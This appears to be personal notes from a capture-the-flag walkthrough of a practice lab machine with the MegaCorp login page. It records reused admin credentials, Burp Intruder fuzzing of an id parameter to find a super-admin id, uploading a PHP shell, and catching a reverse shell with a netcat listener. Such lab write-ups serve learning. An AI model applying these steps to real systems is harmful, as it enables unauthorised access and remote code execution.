2 :80
from source or login page:
admin@megacorp.com
http://10.10.10.28/cdn-cgi/login/index.php
Using password from ARCHETYPE BOX (as they are all in the same track)
> admin:MEGACORP_4dm1n!!
Browsed all pages, nothing available
Looking at
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1
we can try fuzzing `id`
Using Burp Intrude, simple list 1-30;step 1;
We get id=30
<td>86575</td><td>super admin</td><td>superadmin@megacorp.com</td>
To access http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
we change access id=86575
Upload php shell
[18:08:05] 301 - 312B - /uploads -> http://10.10.10.28/uploads/
[18:08:05] 403 - 276B - /uploads/
http://10.10.10.28/uploads/shell.php
─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.28] 40116
SOCKET: Shell has connected! PID: 3615
whoami
www-data
Last updated